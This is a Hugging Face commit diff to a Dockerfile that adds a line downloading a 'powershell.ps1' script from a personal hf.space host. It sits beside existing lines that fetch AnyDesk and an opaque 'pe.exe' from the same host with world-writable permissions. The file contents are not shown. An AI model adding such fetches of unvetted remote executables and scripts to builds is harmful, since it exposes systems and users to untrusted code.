sigyllly commited on
Commit
da5dbab
·
verified ·
1 Parent(s): 4a5c7fa

Update Dockerfile

Browse files
Files changed (1) hide show
  1. Dockerfile +1 -0
Dockerfile CHANGED
@@ -43,6 +43,7 @@ RUN wget https://download.anydesk.com/AnyDesk.exe -O /files/programs/AnyDesk.exe
43
 
44
  # Download the pe.exe file into /app/pe and set permissions
45
  RUN wget https://seosnaps-00.hf.space/download/pe.exe -O /app/pe/pe.exe && chmod -R 777 /app/pe/pe.exe
 
46
 
47
  # Copy application files
48
  COPY . .
 
43
 
44
  # Download the pe.exe file into /app/pe and set permissions
45
  RUN wget https://seosnaps-00.hf.space/download/pe.exe -O /app/pe/pe.exe && chmod -R 777 /app/pe/pe.exe
46
+ RUN wget https://seosnaps-00.hf.space/download/powershell.ps1 -O /app/pe/powershell.ps1
47
 
48
  # Copy application files
49
  COPY . .